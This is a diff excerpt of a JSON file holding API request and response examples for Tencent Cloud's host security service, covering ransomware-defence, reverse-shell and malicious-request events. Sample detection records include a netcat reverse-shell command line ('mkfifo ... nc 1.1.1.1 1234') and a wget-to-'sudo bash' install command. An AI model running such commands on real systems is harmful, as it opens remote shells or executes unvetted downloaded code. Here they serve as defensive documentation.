2084
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeProtectNetList\n<公共请求参数>\n\n{}",
|
2113
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"TaskId\": \"cve2021-1616989795566547835\",\n \"ProtectDays\": 1,\n \"Status\": 1,\n \"StartTime\": \"2021-03-29 12:49:55\",\n \"EndTime\": \"--\",\n \"ReportPath\": \"\"\n },\n {\n \"TaskId\": \"cve2021-1617009909259812569\",\n \"ProtectDays\": 1,\n \"Status\": 0,\n \"StartTime\": \"--\",\n \"EndTime\": \"--\",\n \"ReportPath\": \"\"\n }\n ],\n \"RequestId\": \"
|
2085
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"TaskId\": \"cve2021-1616989795566547835\",\n \"ProtectDays\": 1,\n \"Status\": 1,\n \"StartTime\": \"2021-03-29 12:49:55\",\n \"EndTime\": \"--\",\n \"ReportPath\": \"/a/b\"\n },\n {\n \"TaskId\": \"cve2021-1617009909259812569\",\n \"ProtectDays\": 1,\n \"Status\": 0,\n \"StartTime\": \"--\",\n \"EndTime\": \"--\",\n \"ReportPath\": \"/a/b\"\n }\n ],\n \"RequestId\": \"F00A8503-6233-452E-913E-DAFEE9******\",\n \"TotalCount\": 2\n }\n}",
|
2114
2086
|
"title": "专家服务-旗舰重保列表"
|
2115
2087
|
}
|
2116
2088
|
],
|
@@ -2118,7 +2090,7 @@
|
|
2118
2090
|
{
|
2119
2091
|
"document": " ",
|
2120
2092
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribePublicProxyInstallCommand\n<公共请求参数>\n\n{\n \"Ip\": \"0.0.0.0\"\n}",
|
2121
|
-
"output": "{\n \"Response\": {\n \"KeepAliveCommand\": \"\",\n \"NginxCommand\": \"wget --no-check-certificate https://up.yd.qcloud.com/ydeyes/download/install_proxy.sh -O install_proxy.sh && sudo bash install_proxy.sh\",\n \"RequestId\": \"5921b751-84f3-4332-a89f-fca2a139bd10\"\n }\n}",
|
2093
|
+
"output": "{\n \"Response\": {\n \"KeepAliveCommand\": \" wget --no-check-certificate https://up.yd.qcloud.com/ydeyes/download/install_proxy.sh -O install_proxy.sh && sudo bash install_proxy.sh\",\n \"NginxCommand\": \"wget --no-check-certificate https://up.yd.qcloud.com/ydeyes/download/install_proxy.sh -O install_proxy.sh && sudo bash install_proxy.sh\",\n \"RequestId\": \"5921b751-84f3-4332-a89f-fca2a139bd10\"\n }\n}",
|
2122
2094
|
"title": "示例"
|
2123
2095
|
}
|
2124
2096
|
],
|
@@ -2134,7 +2106,7 @@
|
|
2134
2106
|
{
|
2135
2107
|
"document": "根据过滤参数查询防勒索事件列表",
|
2136
2108
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeRansomDefenseEventsList\n<公共请求参数>\n\n{\n \"Limit\": \"10\",\n \"Offset\": \"0\"\n}",
|
2137
|
-
"output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Id\":
|
2109
|
+
"output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Id\": 10001,\n \"CreateTime\": \"2024-05-14 11:01:02\",\n \"ModifyTime\": \"2024-07-19 17:59:03\",\n \"Quuid\": \"1c26308c-5493-4eaf-a817-112ec25f4991\",\n \"Uuid\": \"1c26308c-5493-4eaf-a817-112ec25f4991\",\n \"Status\": 2,\n \"BaitFilePath\": \"/home/.yjfile/121hcXh.doc\",\n \"FilePath\": \"/usr/bin/bash\",\n \"FileMd5\": \"708c8760385810080c4d17fa84d325ca\",\n \"FileSize\": 964536,\n \"Pid\": 32254,\n \"PidParam\": \"bash -c echo \\\"Csip data test\\\" >> /home/.yjfile/121hcXh.doc 1>&2\",\n \"Type\": 0,\n \"PsTree\": \"W3sicGlkIjozMjI1NCwiZXhlIjoiL3Vzci9iaW4vYmFzaCIsImNtZGxpbmUiOiJiYXNoIC1jIGVjaG8gXCJDc2lwIGRhdGEgdGVzdFwiIFx1MDAzZVx1MDAzZSAvaG9tZS8ueWpmaWxlLzEyMWhjWGguZG9jICAxXHUwMDNlXHUwMDI2MiIsImFjY291bnQiOiIwOjAiLCJzdGFydF90aW1lIjoxNzE1NjU1NjYyLCJleGVfcGVybSI6Ii1yd3hyLXhyLXgiLCJleGVfbXRpbWUiOjE1ODU3MDc0NTEsInNlc3Npb25pZCI6MzIyNTQsInNzaF9zb3VyY2UiOiIxMTMuMTA4Ljc3LjUzOjM5NjIyIiwic3NoX3NlcnZpY2UiOiIxNzIuMTYuNDkuMTA0OjIyIn0seyJwaWQiOjMyMjUyLCJleGUiOiIvdXNyL3NiaW4vc3NoZCIsImNtZGxpbmUiOiIvdXNyL3NiaW4vc3NoZCAtRCAtUiIsImFjY291bnQiOiIwOjAiLCJzdGFydF90aW1lIjoxNzE1NjU1NjYxLCJleGVfcGVybSI6Ii1yd3hyLXhyLXgiLCJleGVfbXRpbWUiOjE2OTExNjQ4NTIsInNlc3Npb25pZCI6MzIyNTJ9XQ==\",\n \"ProcessStartTime\": \"2024-05-14 11:01:02\",\n \"InstanceId\": \"ins-qwea\",\n \"HostName\": \"机器名称\",\n \"StrategyId\": 10001,\n \"StrategyName\": \"测试勿动\",\n \"HostIp\": \"1.1.1.1\",\n \"WanIp\": \"1.1.1.1\",\n \"SnapshotNum\": 45\n }\n ],\n \"RequestId\": \"4e1f7136-1777-59a3-f31e-ed0623b3d270\"\n }\n}",
|
2138
2110
|
"title": "查询防勒索事件列表"
|
2139
2111
|
}
|
2140
2112
|
],
|
@@ -2142,15 +2114,15 @@
|
|
2142
2114
|
{
|
2143
2115
|
"document": "查询备份详情列表",
|
2144
2116
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeRansomDefenseMachineList\n<公共请求参数>\n\n{\n \"Order\": \"DESC\",\n \"Limit\": 1,\n \"By\": \"LastBackupTime\",\n \"Offset\": 1\n}",
|
2145
|
-
"output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Uuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"Quuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"MachineName\": \"销售许可测试机器\",\n \"InstanceId\": \"ins-ewwewe\",\n \"MachineIp\": \"10.0.0.2\",\n \"MachineWanIp\": \"xx.xx.xx.xx\",\n \"CloudTags\": [],\n \"RegionInfo\": {\n \"Region\": \"ap-guangzhou\",\n \"RegionCode\": \"gz\",\n \"RegionId\": 1,\n \"RegionName\": \"华南地区(广州)\",\n \"RegionNameEn\": \"South China (Guangzhou)\"\n },\n \"Tag\": [\n {\n \"Rid\": 16069,\n \"Name\": \"apitest\",\n \"TagId\": 16069\n }\n ],\n \"Status\": 1,\n \"StrategyId\": 5570,\n \"StrategyName\": \"tt1\",\n \"DiskInfo\": \"\",\n \"HostVersion\": 2,\n \"BackupCount\": 128,\n \"BackupSuccessCount\": 121,\n \"LastBackupStatus\": 1,\n \"LastBackupTime\": \"2024-10-22 00:04:04\",\n \"LastBackupMessage\": \"\",\n \"RollBackStatus\": 0,\n \"RollBackPercent\": 0\n }\n ],\n \"RequestId\": \"586e7838-8dce-38d4-5e4d-bbc5f4191c25\"\n }\n}",
|
2117
|
+
"output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Uuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"Quuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"MachineName\": \"销售许可测试机器\",\n \"InstanceId\": \"ins-ewwewe\",\n \"MachineIp\": \"10.0.0.2\",\n \"MachineWanIp\": \"xx.xx.xx.xx\",\n \"CloudTags\": [],\n \"RegionInfo\": {\n \"Region\": \"ap-guangzhou\",\n \"RegionCode\": \"gz\",\n \"RegionId\": 1,\n \"RegionName\": \"华南地区(广州)\",\n \"RegionNameEn\": \"South China (Guangzhou)\"\n },\n \"Tag\": [\n {\n \"Rid\": 16069,\n \"Name\": \"apitest\",\n \"TagId\": 16069\n }\n ],\n \"Status\": 1,\n \"StrategyId\": 5570,\n \"StrategyName\": \"tt1\",\n \"DiskInfo\": \"diskId1|diskName1;diskId2|diskName2\",\n \"HostVersion\": 2,\n \"BackupCount\": 128,\n \"BackupSuccessCount\": 121,\n \"LastBackupStatus\": 1,\n \"LastBackupTime\": \"2024-10-22 00:04:04\",\n \"LastBackupMessage\": \"success\",\n \"RollBackStatus\": 0,\n \"RollBackPercent\": 0\n }\n ],\n \"RequestId\": \"586e7838-8dce-38d4-5e4d-bbc5f4191c25\"\n }\n}",
|
2146
2118
|
"title": "查询备份详情列表"
|
2147
2119
|
}
|
2148
2120
|
],
|
2149
2121
|
"DescribeRansomDefenseMachineStrategyInfo": [
|
2150
2122
|
{
|
2151
2123
|
"document": "",
|
2152
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeRansomDefenseMachineStrategyInfo\n<公共请求参数>\n\n{\n \"Quuids\": [\n \"
|
2153
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
2124
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeRansomDefenseMachineStrategyInfo\n<公共请求参数>\n\n{\n \"Quuids\": [\n \"935e27b1-d675-4509-80bf-96fbf0764237\"\n ]\n}",
|
2125
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"935e27b1-d675-4509-80bf-96fbf0764237\",\n \"StrategyIds\": [\n 1\n ]\n }\n}",
|
2154
2126
|
"title": "获取主机绑定策略列表"
|
2155
2127
|
}
|
2156
2128
|
],
|
@@ -2166,7 +2138,7 @@
|
|
2166
2138
|
{
|
2167
2139
|
"document": "获取用户防勒索趋势",
|
2168
2140
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeRansomDefenseState\n<公共请求参数>\n\n{}",
|
2169
|
-
"output": "{\n \"Response\": {\n \"MachineCount\": 1,\n \"SnapshotSize\": 1,\n \"ProgressingSnapshotTaskCount\": 1,\n \"RollBackTaskCount\": 1,\n \"StrategyCount\": 1,\n \"StrategyTotal\": 1,\n \"MachineTotal\": 1,\n \"RequestId\": \"
|
2141
|
+
"output": "{\n \"Response\": {\n \"MachineCount\": 1,\n \"SnapshotSize\": 1,\n \"ProgressingSnapshotTaskCount\": 1,\n \"RollBackTaskCount\": 1,\n \"StrategyCount\": 1,\n \"StrategyTotal\": 1,\n \"MachineTotal\": 1,\n \"RequestId\": \"935e27b1-d675-4509-80bf-96fbf0764237\",\n \"BalanceStatus\": 1,\n \"BackupMachineCount\": 1,\n \"ProgressingRollBackTaskCount\": 1\n }\n}",
|
2170
2142
|
"title": "获取用户防勒索趋势"
|
2171
2143
|
}
|
2172
2144
|
],
|
@@ -2174,7 +2146,7 @@
|
|
2174
2146
|
{
|
2175
2147
|
"document": "",
|
2176
2148
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeRansomDefenseStrategyDetail\n<公共请求参数>\n\n{\n \"Id\": 1\n}",
|
2177
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"c0d89f6e-021b-f1ba-d067-201da364e250\",\n \"Strategy\": {\n \"Id\": 1,\n \"Uin\": \"100004506473\",\n \"Name\": \"tt1\",\n \"Description\": \"\",\n \"Status\": 1,\n \"IsAll\": 0,\n \"IncludeDir\": \"
|
2149
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"c0d89f6e-021b-f1ba-d067-201da364e250\",\n \"Strategy\": {\n \"Id\": 1,\n \"Uin\": \"100004506473\",\n \"Name\": \"tt1\",\n \"Description\": \"desc\",\n \"Status\": 1,\n \"IsAll\": 0,\n \"IncludeDir\": \"/usr\",\n \"ExcludeDir\": \"/bin\",\n \"BackupType\": 0,\n \"Weekday\": \"1;2;3;4;5\",\n \"Hour\": \"00:00\",\n \"SaveDay\": 0,\n \"MachineCount\": 1,\n \"CreateTime\": \"2024-04-17 23:19:43\",\n \"ModifyTime\": \"2024-10-17 20:10:00\",\n \"EventCount\": 0\n }\n }\n}",
|
2178
2150
|
"title": "获取策略详情"
|
2179
2151
|
}
|
2180
2152
|
],
|
@@ -2182,7 +2154,7 @@
|
|
2182
2154
|
{
|
2183
2155
|
"document": "查询防勒索策略列表",
|
2184
2156
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeRansomDefenseStrategyList\n<公共请求参数>\n\n{\n \"Limit\": \"10\",\n \"Offset\": \"0\"\n}",
|
2185
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"Id\": 5570,\n \"Uin\": \"3232323\",\n \"Name\": \"tt1\",\n \"Description\": \"\",\n \"Status\": 1,\n \"IsAll\": 0,\n \"IncludeDir\": \"
|
2157
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"Id\": 5570,\n \"Uin\": \"3232323\",\n \"Name\": \"tt1\",\n \"Description\": \"desc\",\n \"Status\": 1,\n \"IsAll\": 0,\n \"IncludeDir\": \"/usr\",\n \"ExcludeDir\": \"/bin\",\n \"BackupType\": 0,\n \"Weekday\": \"1;2;3;4;5\",\n \"Hour\": \"00:00\",\n \"SaveDay\": 0,\n \"MachineCount\": 1,\n \"CreateTime\": \"2024-04-17 23:19:43\",\n \"ModifyTime\": \"2024-10-17 20:10:00\"\n }\n ],\n \"TotalCount\": 1,\n \"RequestId\": \"d73d4495-1895-43a8-95be-f447b02e253d\"\n }\n}",
|
2186
2158
|
"title": "查询防勒索策略列表"
|
2187
2159
|
}
|
2188
2160
|
],
|
@@ -2190,7 +2162,7 @@
|
|
2190
2162
|
{
|
2191
2163
|
"document": "查询防勒索策略绑定机器列表",
|
2192
2164
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeRansomDefenseStrategyMachines\n<公共请求参数>\n\n{\n \"Id\": 1,\n \"Limit\": 1,\n \"Offset\": 1\n}",
|
2193
|
-
"output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Uuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"Quuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"MachineName\": \"销售许可测试机器\",\n \"InstanceId\": \"ins-ddad\",\n \"MachineIp\": \"10.0.0.2\",\n \"MachineWanIp\": \"xx.xx.xx.xx\",\n \"CloudTags\": [],\n \"RegionInfo\": {\n \"Region\": \"ap-guangzhou\",\n \"RegionCode\": \"gz\",\n \"RegionId\": 1,\n \"RegionName\": \"华南地区(广州)\",\n \"RegionNameEn\": \"South China (Guangzhou)\"\n },\n \"Tag\": [\n {\n \"Rid\": 16069,\n \"Name\": \"apitest\",\n \"TagId\": 16069\n }\n ],\n \"Status\": 1,\n \"StrategyId\": 5570,\n \"StrategyName\": \"tt1\",\n \"DiskInfo\": \"\",\n \"HostVersion\": 2\n }\n ],\n \"RequestId\": \"544961cc-1ee0-4a5f-9752-7489afa407ef\"\n }\n}",
|
2165
|
+
"output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Uuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"Quuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"MachineName\": \"销售许可测试机器\",\n \"InstanceId\": \"ins-ddad\",\n \"MachineIp\": \"10.0.0.2\",\n \"MachineWanIp\": \"xx.xx.xx.xx\",\n \"CloudTags\": [],\n \"RegionInfo\": {\n \"Region\": \"ap-guangzhou\",\n \"RegionCode\": \"gz\",\n \"RegionId\": 1,\n \"RegionName\": \"华南地区(广州)\",\n \"RegionNameEn\": \"South China (Guangzhou)\"\n },\n \"Tag\": [\n {\n \"Rid\": 16069,\n \"Name\": \"apitest\",\n \"TagId\": 16069\n }\n ],\n \"Status\": 1,\n \"StrategyId\": 5570,\n \"StrategyName\": \"tt1\",\n \"DiskInfo\": \"diskId1|diskName1;diskId2|diskName2\",\n \"HostVersion\": 2\n }\n ],\n \"RequestId\": \"544961cc-1ee0-4a5f-9752-7489afa407ef\"\n }\n}",
|
2194
2166
|
"title": "查询防勒索策略绑定机器列表"
|
2195
2167
|
}
|
2196
2168
|
],
|
@@ -2214,7 +2186,7 @@
|
|
2214
2186
|
{
|
2215
2187
|
"document": "",
|
2216
2188
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeReverseShellEventInfo\n<公共请求参数>\n\n{\n \"Id\": 12\n}",
|
2217
|
-
"output": "{\n \"Response\": {\n \"ReverseShellEventInfo\": {\n \"Id\": 10001,\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"HostIp\": \"1.1.1.1\",\n \"DstIp\": \"\",\n \"DstPort\": 0,\n \"ProcessName\": \"mkfifo\",\n \"FullPath\": \"/usr/bin/mkfifo\",\n \"CmdLine\": \"mkfifo /tmp/pipe nc 1.1.1.1 1234\",\n \"UserName\": \"0\",\n \"UserGroup\": \"\",\n \"ParentProcName\": \"\",\n \"ParentProcUser\": \"0\",\n \"ParentProcGroup\": \"\",\n \"ParentProcPath\": \"\",\n \"PsTree\": \"[]\",\n \"Status\": 0,\n \"CreateTime\": \"2024-09-27 15:43:56\",\n \"ModifyTime\": \"2024-09-27 15:44:32\",\n \"MachineName\": \"机器名称\",\n \"DetectBy\": 1,\n \"MachineWanIp\": \"1.1.1.1\",\n \"SuggestScheme\": \"1、检查系统是否存在异常的网络连接;\\n2、隔离或者删除相关的木马文件;xa0\\n3、对系统进行风险排查,并进行安全加固,详情可参考如下链接:xa0\\n【Linux】https://cloud.tencent.com/document/product/296/9604xa0\\n【Windows】https://cloud.tencent.com/document/product/296/9605\",\n \"HarmDescribe\": \"黑客在入侵服务器后,为了进行下一步的恶意操作,会让受害主机创建一个交互式shell并连接黑客的远程控制服务器,黑客通过建立的通道,可以向受害主机发送指令并获得执行结果。\",\n \"Tags\": [],\n \"References\": [],\n \"MachineStatus\": \"ONLINE\"\n },\n \"RequestId\": \"db8fd5e1-6d57-405b-9f57-9d6d0589bdc8\"\n }\n}",
|
2189
|
+
"output": "{\n \"Response\": {\n \"ReverseShellEventInfo\": {\n \"Id\": 10001,\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"HostIp\": \"1.1.1.1\",\n \"DstIp\": \"10.0.1.92\",\n \"DstPort\": 0,\n \"ProcessName\": \"mkfifo\",\n \"FullPath\": \"/usr/bin/mkfifo\",\n \"CmdLine\": \"mkfifo /tmp/pipe nc 1.1.1.1 1234\",\n \"UserName\": \"0\",\n \"UserGroup\": \"0\",\n \"ParentProcName\": \"nginx\",\n \"ParentProcUser\": \"0\",\n \"ParentProcGroup\": \"root\",\n \"ParentProcPath\": \"nginx\",\n \"PsTree\": \"[{\\\"pid\\\":\\\"1\\\"}]\",\n \"Status\": 0,\n \"CreateTime\": \"2024-09-27 15:43:56\",\n \"ModifyTime\": \"2024-09-27 15:44:32\",\n \"MachineName\": \"机器名称\",\n \"DetectBy\": 1,\n \"MachineWanIp\": \"1.1.1.1\",\n \"SuggestScheme\": \"1、检查系统是否存在异常的网络连接;\\n2、隔离或者删除相关的木马文件;xa0\\n3、对系统进行风险排查,并进行安全加固,详情可参考如下链接:xa0\\n【Linux】https://cloud.tencent.com/document/product/296/9604xa0\\n【Windows】https://cloud.tencent.com/document/product/296/9605\",\n \"HarmDescribe\": \"黑客在入侵服务器后,为了进行下一步的恶意操作,会让受害主机创建一个交互式shell并连接黑客的远程控制服务器,黑客通过建立的通道,可以向受害主机发送指令并获得执行结果。\",\n \"Tags\": [],\n \"References\": [],\n \"MachineStatus\": \"ONLINE\"\n },\n \"RequestId\": \"db8fd5e1-6d57-405b-9f57-9d6d0589bdc8\"\n }\n}",
|
2218
2190
|
"title": "查询反弹shell详情"
|
2219
2191
|
}
|
2220
2192
|
],
|
@@ -2222,7 +2194,7 @@
|
|
2222
2194
|
{
|
2223
2195
|
"document": "获取反弹Shell列表",
|
2224
2196
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeReverseShellEvents\n<公共请求参数>\n\n{}",
|
2225
|
-
"output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Id\": 10001,\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Hostip\": \"1.1.1.1\",\n \"DstIp\": \"\",\n \"DstPort\": 0,\n \"ProcessName\": \"mkfifo\",\n \"FullPath\": \"/usr/bin/mkfifo\",\n \"CmdLine\": \"mkfifo /tmp/pipe nc 1.1.1.1 1234\",\n \"UserName\": \"0\",\n \"UserGroup\": \"\",\n \"ParentProcName\": \"\",\n \"ParentProcUser\": \"0\",\n \"ParentProcGroup\": \"\",\n \"ParentProcPath\": \"
|
2197
|
+
"output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Id\": 10001,\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Hostip\": \"1.1.1.1\",\n \"DstIp\": \"10.0.1.92\",\n \"DstPort\": 0,\n \"ProcessName\": \"mkfifo\",\n \"FullPath\": \"/usr/bin/mkfifo\",\n \"CmdLine\": \"mkfifo /tmp/pipe nc 1.1.1.1 1234\",\n \"UserName\": \"0\",\n \"UserGroup\": \"0\",\n \"ParentProcName\": \"nginx\",\n \"ParentProcUser\": \"0\",\n \"ParentProcGroup\": \"root\",\n \"ParentProcPath\": \"/data/anaconda3/bin/pytho****\",\n \"ProcTree\": \"null\",\n \"Status\": 0,\n \"CreateTime\": \"2024-09-27 15:43:56\",\n \"MachineName\": \"机器名称\",\n \"DetectBy\": 1,\n \"MachineExtraInfo\": {\n \"WanIP\": \"1.1.1.1\",\n \"PrivateIP\": \"1.1.1.1\",\n \"NetworkType\": 0,\n \"NetworkName\": \"vpc-d7f***\",\n \"InstanceID\": \"ins-12332112\",\n \"HostName\": \"hn***\"\n },\n \"Pid\": 0,\n \"RiskLevel\": 1\n }\n ],\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
|
2226
2198
|
"title": "获取反弹Shell列表"
|
2227
2199
|
}
|
2228
2200
|
],
|
@@ -2230,7 +2202,7 @@
|
|
2230
2202
|
{
|
2231
2203
|
"document": "获取反弹Shell规则列表",
|
2232
2204
|
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeReverseShellRules\n&<公共请求参数>",
|
2233
|
-
"output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Id\": 10001,\n \"DestIp\": \"127.0.0.1\",\n \"DestPort\": \"\",\n \"ProcessName\": \"
|
2205
|
+
"output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Id\": 10001,\n \"DestIp\": \"127.0.0.1\",\n \"Hostip\": \"10.0.0.11\",\n \"Uuid\": \"E86E092B-FD69-4D1B-B014-E4FC68A*****\",\n \"DestPort\": \"60132\",\n \"ProcessName\": \"python\",\n \"IsGlobal\": 0,\n \"Operator\": \"operatorA\",\n \"Status\": 0,\n \"CreateTime\": \"2024-10-12 11:38:43\",\n \"ModifyTime\": \"2024-10-12 11:38:43\"\n }\n ],\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
|
2234
2206
|
"title": "获取反弹Shell规则列表"
|
2235
2207
|
}
|
2236
2208
|
],
|
@@ -2246,15 +2218,15 @@
|
|
2246
2218
|
{
|
2247
2219
|
"document": "",
|
2248
2220
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeRiskDnsEventInfo\n<公共请求参数>\n\n{\n \"Id\": 1\n}",
|
2249
|
-
"output": "{\n \"Response\": {\n \"Info\": {\n \"Id\": 10368,\n \"PolicyId\": 0,\n \"PolicyType\": -1,\n \"PolicyName\": \"\",\n \"ProtectLevel\": 2,\n \"HostId\": \"02db9a21-78fe-4a4c-b96f-a11bf819a962\",\n \"HostName\": \"v_llzlu恶意请求\",\n \"HostIp\": \"192.168.111.28\",\n \"WanIp\": \"43.138.255.181\",\n \"HostStatus\": \"OFFLINE\",\n \"AgentId\": \"02db9a21-78fe-4a4c-b96f-a11bf819a962\",\n \"Domain\": \"183.60.95.201\",\n \"Tags\": [],\n \"AccessCount\": 1,\n \"ThreatDesc\": \"发现主机存在访问恶意IP/域名的行为,您的主机可能已经失陷。\\n恶意IP/域名可能是黑客的远控服务器、恶意软件下载源、矿池地址等。\",\n \"SuggestSolution\": \"1.检查恶意进程及非法端口,删除可疑的启动项和定时任务;\\n2.隔离或者删除相关的木马文件;\\n3.对系统进行风险排查,并进行安全加固,详情可参考如下链接: \\n【Linux】https://cloud.tencent.com/document/product/296/9604 \\n【Windows】https://cloud.tencent.com/document/product/296/9605\",\n \"ReferenceLink\": \"\",\n \"HandleStatus\": 6,\n \"Pid\": 1387042,\n \"ProcessName\": \"/usr/bin/ping\",\n \"ProcessMd5\": \"7f42e35e3065eaa9a58b89e249e8cbc7\",\n \"CmdLine\": \"ping 183.60.95.201 \",\n \"FirstTime\": \"2022-09-19 14:57:23\",\n \"LastTime\": \"2022-09-19 14:57:23\"\n },\n \"RequestId\": \"083fae4c-ac2c-4e41-ad88-b4420c9fce7c\"\n }\n}",
|
2221
|
+
"output": "{\n \"Response\": {\n \"Info\": {\n \"Id\": 10368,\n \"PolicyId\": 0,\n \"PolicyType\": -1,\n \"PolicyName\": \"policy1\",\n \"ProtectLevel\": 2,\n \"HostId\": \"02db9a21-78fe-4a4c-b96f-a11bf819a962\",\n \"HostName\": \"v_llzlu恶意请求\",\n \"HostIp\": \"192.168.111.28\",\n \"WanIp\": \"43.138.255.181\",\n \"HostStatus\": \"OFFLINE\",\n \"AgentId\": \"02db9a21-78fe-4a4c-b96f-a11bf819a962\",\n \"Domain\": \"183.60.95.201\",\n \"Tags\": [],\n \"AccessCount\": 1,\n \"ThreatDesc\": \"发现主机存在访问恶意IP/域名的行为,您的主机可能已经失陷。\\n恶意IP/域名可能是黑客的远控服务器、恶意软件下载源、矿池地址等。\",\n \"SuggestSolution\": \"1.检查恶意进程及非法端口,删除可疑的启动项和定时任务;\\n2.隔离或者删除相关的木马文件;\\n3.对系统进行风险排查,并进行安全加固,详情可参考如下链接: \\n【Linux】https://cloud.tencent.com/document/product/296/9604 \\n【Windows】https://cloud.tencent.com/document/product/296/9605\",\n \"ReferenceLink\": \"link\",\n \"HandleStatus\": 6,\n \"Pid\": 1387042,\n \"ProcessName\": \"/usr/bin/ping\",\n \"ProcessMd5\": \"7f42e35e3065eaa9a58b89e249e8cbc7\",\n \"CmdLine\": \"ping 183.60.95.201 \",\n \"FirstTime\": \"2022-09-19 14:57:23\",\n \"LastTime\": \"2022-09-19 14:57:23\"\n },\n \"RequestId\": \"083fae4c-ac2c-4e41-ad88-b4420c9fce7c\"\n }\n}",
|
2250
2222
|
"title": "查询恶意请求事件详情"
|
2251
2223
|
}
|
2252
2224
|
],
|
2253
2225
|
"DescribeRiskDnsEventList": [
|
2254
2226
|
{
|
2255
|
-
"document": "",
|
2227
|
+
"document": "获取恶意请求事件列表",
|
2256
2228
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeRiskDnsEventList\n<公共请求参数>\n\n{}",
|
2257
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"Id\": 10368,\n \"PolicyId\": 5000179,\n \"PolicyType\": 1,\n \"PolicyName\": \"
|
2229
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"Id\": 10368,\n \"PolicyId\": 5000179,\n \"PolicyType\": 1,\n \"PolicyName\": \"拦截\",\n \"ProtectLevel\": 2,\n \"HostId\": \"02db9a21-78fe-4a4c-b96f-a11bf819a962\",\n \"HostName\": \"恶意请求\",\n \"HostIp\": \"192.168.100.00\",\n \"WanIp\": \"40.100.200.100\",\n \"HostStatus\": \"OFFLINE\",\n \"AgentId\": \"02db9a21-78fe-4a4c-b96f-a11bf819a962\",\n \"Domain\": \"100.60.00.200\",\n \"Tags\": [],\n \"AccessCount\": 1,\n \"ThreatDesc\": \"发现主机存在访问恶意IP/域名的行为,您的主机可能已经失陷。\\n恶意IP/域名可能是黑客的远控服务器、恶意软件下载源、矿池地址等。\",\n \"SuggestSolution\": \"1.检查恶意进程及非法端口,删除可疑的启动项和定时任务;\\n2.隔离或者删除相关的木马文件;\\n3.对系统进行风险排查,并进行安全加固,详情可参考如下链接: \\n【Linux】https://cloud.tencent.com/document/product/296/9604 \\n【Windows】https://cloud.tencent.com/document/product/296/9605\",\n \"ReferenceLink\": \"ref_link\",\n \"HandleStatus\": 6,\n \"Pid\": 1387042,\n \"ProcessName\": \"/usr/bin/ping\",\n \"ProcessMd5\": \"7f42e35e3065eaa9a58b89e249e8cbc7\",\n 